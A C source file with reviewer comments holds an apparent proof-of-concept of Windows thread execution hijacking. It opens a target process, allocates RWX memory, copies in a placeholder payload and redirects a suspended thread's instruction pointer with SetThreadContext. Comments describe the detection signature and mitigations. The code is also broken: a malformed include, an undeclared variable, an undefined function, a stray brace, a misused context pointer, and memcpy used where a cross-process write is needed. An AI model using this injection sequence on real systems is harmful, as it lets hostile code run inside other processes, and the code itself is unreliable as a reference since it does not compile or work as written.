#include <stdio.h>
#include <Windows>h>
/*
 * get_th_id - look for a thread owned by the process `pid` by walking a
 * Toolhelp32 thread snapshot (CreateToolhelp32Snapshot + Thread32First/Next).
 *
 * Defender's note: thread enumeration on its own is benign (debuggers and
 * monitoring tools do exactly this); it only becomes interesting as the
 * first step of the thread-hijacking sequence in main() below, where the
 * returned id is fed to OpenThread / SuspendThread / SetThreadContext.
 *
 * Return value, as written: `th_id` (still its initial value 0) when a
 * thread owned by pid is found; -1 (which converts to 0xFFFFFFFF for a
 * DWORD) if the snapshot cannot be created; FALSE if Thread32First fails;
 * and no value at all if the loop ends without a match.
 *
 * NOTE(review): this block does not compile as written - it declares `te`
 * but then reads and writes `te32`, which is never declared, and it calls
 * printError(), which is not defined anywhere in this file. Left
 * byte-identical; only comments were added.
 */
DWORD get_th_id(DWORD pid){
DWORD th_id=0; // never updated below, so the match path returns 0
THREADENTRY te; // NOTE(review): declared here, but the code below uses `te32`
HANDLE snap;
snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0); // system-wide thread list
if(snap == INVALID_HANDLE_VALUE){
return -1; // -1 in a DWORD-returning function wraps to 0xFFFFFFFF
}
te32.dwSize = sizeof(THREADENTRY); // Toolhelp requires dwSize before the first call
if( !Thread32First( snap, &te ) )
{
printError( TEXT("Thread32First") ); // show cause of failure
CloseHandle( snap ); // clean the snapshot object
return( FALSE );
}
do
{
if( te32.th32OwnerProcessID == pid ) // first thread whose owner process is pid
{
_tprintf( TEXT("\n\n THREAD ID = 0x%08X"), te32.th32ThreadID );
_tprintf( TEXT("\n Base priority = %d"), te32.tpBasePri );
_tprintf( TEXT("\n Delta priority = %d"), te32.tpDeltaPri );
_tprintf( TEXT("\n"));
return th_id; // returns on the first match; `snap` is not closed on this path
}
} while( Thread32Next(snap, &te32 ) );
CloseHandle( snap ); // no match: snapshot released, but no value is returned
}
} // NOTE(review): stray closing brace - the function body already closed above
/*
 * main - proof-of-concept of "thread execution hijacking": allocate an
 * executable region inside a target process, place a payload there, then
 * redirect one of that process's existing threads to it by rewriting the
 * thread's instruction pointer (Rip) through SetThreadContext.
 *
 * Defender's note - the call sequence below is the canonical signature of
 * the technique and is what EDR / ETW-based detections key on:
 *   OpenProcess(PROCESS_ALL_ACCESS) on a foreign pid
 *   -> VirtualAllocEx(..., PAGE_EXECUTE_READWRITE)  (private RWX memory)
 *   -> OpenThread(THREAD_ALL_ACCESS) on a thread of that pid
 *   -> SuspendThread / GetThreadContext / SetThreadContext / ResumeThread
 * A cross-process SetThreadContext whose new Rip points into a private,
 * non-image-backed RWX region is a high-confidence indicator. Mitigation is
 * the usual least privilege: restrict who can obtain PROCESS_ALL_ACCESS /
 * THREAD_ALL_ACCESS on sensitive processes (process ACLs, protected
 * processes) and alert on cross-process thread-context writes.
 *
 * The target pid is hard-coded as 1234 (a placeholder) and the payload is a
 * placeholder string; none of the API results are checked.
 *
 * NOTE(review): the snippet does not compile as written (for example
 * `context` is declared with the pointer type LPCONTEXT but accessed with
 * `.Rip`). Kept byte-identical; only comments were added.
 */
int main(){
const char shellcode[] = "....."; // placeholder payload; sizeof counts the trailing NUL
HANDLE proc_handle = OpenProcess(PROCESS_ALL_ACCESS,NULL,1234); // full-access handle to the hard-coded target pid
LPVOID base_addr = VirtualAllocEx(proc_handle,NULL,sizeof shellcode,MEM_COMMIT |MEM_RESERVE,PAGE_EXECUTE_READWRITE); // RWX allocation in the target: the first detection hotspot
memcpy(base_addr,shellcode,sizeof shellcode); // copies the placeholder payload to base_addr
DWORD thread_id = get_th_id(1234); // victim-thread lookup via get_th_id() above
HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS,NULL,thread_id); // full-access handle to the victim thread
SuspendThread(thread_handle); // freeze the thread so its register state can be rewritten
LPCONTEXT context = {0}; // NOTE(review): a pointer initialised to NULL, not a CONTEXT object
GetThreadContext(thread_handle,context); // read the thread's register state
context.Rip = (DWORD_PTR)base_addr; // the hijack itself: point the instruction pointer at the allocated region
SetThreadContext(thread_handle,context); // write it back - the call defenders should alert on
ResumeThread(thread_handle); // thread resumes executing at base_addr
return 0;
}